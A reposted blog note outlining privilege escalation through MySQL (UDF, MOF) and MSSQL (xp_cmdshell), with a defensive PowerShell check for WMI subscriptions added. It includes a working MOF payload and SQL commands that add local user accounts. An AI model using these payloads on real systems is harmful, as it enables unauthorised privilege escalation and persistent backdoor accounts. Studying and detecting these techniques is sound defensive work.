Intranet Privilege Escalation: Services

Service privilege escalation

  • mysql

    • UDF privilege escalation

      • Requires write permission, and single quotes must not be filtered
      • windows

        • Export the UDF to the system directory C:/WINDOWS/SYSTEM32/

          MySQL version < 5.1

        • Export the UDF to the install path MYSQL\Lib\Plugin

          MySQL version > 5.1

      • linux

        • /usr/lib/mysql/plugin
    • MOF privilege escalation

      • Windows only

        • Steps

          • 1. Find a writable directory and upload the MOF file
          • 2. Run the following SQL statement; the command inside the MOF file is then executed
          • select load_file('C:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'
        • mofcomp.exe xxx.mof compiles and runs the MOF file
        • It calls the CompileFile method of the IMofCompiler interface
        • #pragma namespace("\\\\.\\root\\subscription")
          instance of __EventFilter as $EventFilter
          {
          EventNamespace = "Root\\Cimv2";
          Name = "filtP2";
          Query = "Select * From __InstanceModificationEvent "
          "Where TargetInstance Isa \"Win32_LocalTime\" "
          "And TargetInstance.Second = 5";
          QueryLanguage = "WQL";
          };
          instance of ActiveScriptEventConsumer as $Consumer
          {
          Name = "consPCSV2";
          ScriptingEngine = "JScript";
          ScriptText =
          "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user secist 123 /add\")";
          };
          instance of __FilterToConsumerBinding
          {
          Consumer = $Consumer;
          Filter = $EventFilter;
          };

  • mssql

    • xp_cmdshell

      • Enable:
        EXEC sp_configure 'show advanced options',1;
        RECONFIGURE;
        EXEC sp_configure 'xp_cmdshell',1;
        RECONFIGURE;
      • exec xp_cmdshell 'net user test test /add'
    • xp_regwrite
    • xp_regread

  • tomcat

    • Weak password
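The MOF in the section above registers a permanent WMI event subscription (filter, ActiveScriptEventConsumer, binding) that survives reboots. The PowerShell below is an added defender's check, not part of the original note: it lists every filter-to-consumer binding in root\subscription and shows the script or command each consumer would run, then lists the newest files in the wbem\mof drop directory. It assumes an elevated prompt on the Windows host being inspected.

```powershell
# Added example: enumerate permanent WMI event subscriptions and show what each
# script/command consumer would execute. Run from an elevated PowerShell prompt.
$ns = 'root\subscription'

$filters   = @(Get-CimInstance -Namespace $ns -ClassName __EventFilter -ErrorAction SilentlyContinue)
$bindings  = @(Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue)
$consumers = @(
    Get-CimInstance -Namespace $ns -ClassName ActiveScriptEventConsumer -ErrorAction SilentlyContinue
    Get-CimInstance -Namespace $ns -ClassName CommandLineEventConsumer  -ErrorAction SilentlyContinue
)

$findings = foreach ($b in $bindings) {
    # Binding.Filter / Binding.Consumer are object references; resolve them by Name.
    $filter   = $filters   | Where-Object { $_.Name -eq $b.Filter.Name }
    $consumer = $consumers | Where-Object { $_.Name -eq $b.Consumer.Name }
    if (-not $consumer) { continue }   # e.g. the built-in NTEventLogEventConsumer binding

    # ActiveScriptEventConsumer carries ScriptText; CommandLineEventConsumer a CommandLineTemplate.
    $payload = if ($consumer.CimClass.CimClassName -eq 'ActiveScriptEventConsumer') {
        $consumer.ScriptText
    } else {
        $consumer.CommandLineTemplate
    }

    [PSCustomObject]@{
        Filter        = $filter.Name
        Query         = $filter.Query
        ConsumerClass = $consumer.CimClass.CimClassName
        Consumer      = $consumer.Name
        Payload       = $payload
    }
}

if ($findings) {
    Write-Warning "Permanent WMI subscriptions with script/command consumers found; review each one:"
    $findings | Format-List
} else {
    Write-Host "No ActiveScript/CommandLine event consumers bound in $ns."
}

# The note drops its MOF into wbem\mof for auto-compilation; list the newest files there if it exists.
$mofDir = Join-Path $env:SystemRoot 'System32\wbem\mof'
if (Test-Path $mofDir) {
    Get-ChildItem -Path $mofDir -File -Recurse |
        Sort-Object LastWriteTime -Descending |
        Select-Object -First 10 FullName, LastWriteTime
}
```

A binding whose filter polls Win32_LocalTime and whose payload spawns WScript.Shell, as in the sample above, is the pattern to look for; the consumer and filter can then be removed with Remove-CimInstance.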


Reposted from www.cnblogs.com/drac4ry/p/12230049.html